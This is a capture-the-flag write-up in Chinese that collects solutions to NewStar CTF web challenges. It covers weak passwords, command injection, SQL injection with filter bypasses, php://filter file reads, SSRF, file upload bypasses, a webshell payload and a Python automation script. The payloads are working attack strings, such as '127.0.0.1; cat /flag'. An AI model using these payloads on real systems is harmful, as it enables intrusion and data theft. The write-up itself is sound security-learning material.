NewStar CTF Web 赛题解题思路汇总

进入下一关后尝试弱口令登录成功：admin/111111。

后端 PHP 代码审计：

• 允许字符：0-9, *, /, ~, (, ), 空白。
• 禁止纯数字/空白。
• 执行逻辑：@eval("$test = $input;")，判断 $test == 2025。

构造 Payload：45*45 (即 2025)。

URL: ?newstar=45*45

获取 flag：

flag{c6582a80-afdd-4ef9-8088-a15455bc30cf}

别笑，你也过不了第二关

难度：简单

前端 JS 控制游戏逻辑，目标分数为 30 和 1000000。直接在控制台修改变量作弊：

score = 1000000;
endLevel();

获取 flag：

flag{8a6f2ab9-9b7e-4274-90bf-efbe94277b14}

Week 2

DD 加速器

难度：简单

存在命令执行漏洞。在 ping 参数中拼接命令：

127.0.0.1; cat /flag

获取 flag：

flag{9cacf6f4-5cc9-4cef-99a8-97c51b2953be}

搞点哦润吉吃吃橘

难度：简单

登录页源码注释泄露密码：Doro/Doro_nJlPVs_@123。

登录后需完成 Token 验证挑战，涉及时间戳计算与异或运算。编写 Python 脚本自动化处理：

#!/usr/bin/env python3
# coding: utf-8
import requests
import re
import time
import sys

BASE = "https://eci-2ze6zyo0m8laq9swg77e.cloudeci1.ichunqiu.com:5000"
LOGIN_PATH = "/login"
START_PATH = "/start_challenge"
VERIFY_PATH = "/verify_token"
USERNAME = "Doro"
PASSWORD = "Doro_nJlPVs_%40123"

def login(session):
    url = BASE + LOGIN_PATH
    session.headers.update({"Origin": BASE, "Referer": BASE + "/login", "Content-Type": "application/x-www-form-urlencoded"})
    data = f"username={USERNAME}&password={PASSWORD}"
    resp = session.post(url, data=data, allow_redirects=False)
    return "Set-Cookie" in resp.headers and "session=" in resp.headers["Set-Cookie"]

def fetch_challenge(session):
    url = BASE + START_PATH
    resp = session.post(url)
    return resp.json()

def parse_and_compute_token(data):
    multiplier = int(data.get("multiplier")) if data.get("multiplier") else None
    xor_raw = data.get("xor_value")
    xor_value = int(xor_raw, 16) if isinstance(xor_raw, str) and xor_raw.lower().startswith("0x") else int(xor_raw)
    tsource = int(time.time())
    token = (tsource * multiplier) ^ xor_value
    return token

def submit_token(session, token):
    url = BASE + VERIFY_PATH
    resp = session.post(url, json={"token": token}, headers={"Content-Type": "application/json"})
    return resp

def main():
    s = requests.Session()
    if not login(s): return
    data = fetch_challenge(s)
    token = parse_and_compute_token(data)
    submit_token(s, token)

if __name__ == "__main__":
    main()

获取 flag：

flag{c596b46c-3c82-4416-9e70-538104015062}

白帽小 K 的故事（1）

难度：困难

文件上传漏洞。前端校验后缀名，抓包修改为 .php 绕过。

通过 /v1/onload 接口获取上传路径，上传包含 <?php phpinfo(); ?> 的测试文件确认解析成功。

获取 flag：

flag{741a9681-2e6c-4486-b767-557e907c8863}

小 E 的管理系统

难度：困难

SQL 注入。防火墙过滤了空格和单引号，但支持报错注入。

1. 使用 %0a 绕过空格过滤。
2. 探测数据库类型为 SQLite。
3. 确定列数为 5。
4. 利用 UNION SELECT 配合 sqlite_master 查询表结构。
5. 最终从 sys_config 表提取 flag。

Payload 示例：

-1%0aUNION%0aselect%0a*%0aFROM(SELECT%0a0)%0aAS%0aA%0aCROSS%0aJOIN%0a(SELECT%0asqlite_version())%0aAS%0aB...

获取 flag：

flag{1148f076-61cb-457a-818f-d910ef21b142}

真的是签到诶

难度：签到

Webshell 解码执行题目。流程：Base64 解码 -> Atbash 替换 -> 去空格 -> ROT13 -> Eval。

构造 Payload：cat /flag 经过上述加密得到 Base64 字符串。

Payload: dW91dGlhKCJrbXRcMDQwL2hibWciKTs=

获取 flag：

flag{8b3bf25f-b724-4f06-9197-ba25bd749249}

Week 3

ez-chain

难度：简单

任意文件读取漏洞。WAF 过滤了 php, base64, data 等关键字，且读取内容不能包含 f。

利用 url 双重编码绕过 WAF，结合 php://filter 伪协议与 rot13 编码读取 flag。

Payload:

file=%25%37%30%25%36%38... (php://filter/string.rot13/resource=/flag 的双重编码)

获取 flag：

flag{8847b675-528e-4ee8-aab6-ff3a854b53bc}

mygo!!!

难度：简单

SSRF 漏洞。限制 HTTP 协议，但可通过内网穿透绕过本地 IP 检查。

利用 SSRF 访问本地 flag.php，并通过 file:///flag 伪协议读取内容。

Payload:

index.php?proxy=http://127.0.0.1/flag.php?soyorin=file:///flag

获取 flag：

flag{a8fe31b5-aad7-4dc1-9bda-3e21daff103f}

小 E 的秘密计划

难度：简单

Git 泄露与 Mac 系统文件泄露。

1. 发现 .git 文件夹，恢复删除的 user.php 获取账号密码。
2. 登录后台后，发现 .DS_Store 文件泄露，其中包含 flag 片段。

获取 flag：

flag{e08813e1-a595-464c-85c5-67b474f83601}

mirror_gate

难度：中等

文件上传漏洞。后端校验文件类型和内容，但 .webp 格式可被解析执行。

将 PHP 代码写入 .webp 文件头部或元数据区域，上传后访问获取 flag。

获取 flag：

flag{fd8af3ec-7983-4724-ad82-e3f84149346f}

who'ssti

难度：中等

SSTI (服务端模板注入) 漏洞。后端使用 Flask 渲染用户输入的模板。

通过调用内置函数触发 Trace 回调，收集特定函数调用列表以获取 Flag。

Payload 构造涉及对象遍历与 __import__ 调用。

获取 flag：

flag{12c4c60d-6a52-4515-85a0-90052c4e6b2b}

白帽小 K 的故事（2）

难度：中等

盲注 SQL 注入。空格被过滤，使用括号 () 绕过。

编写 Python 脚本进行布尔盲注，依次枚举数据库名、表名、列名及数据。

获取 flag：

flag{b2f00fa9-8d65-45ac-9193-8a852c4910fb}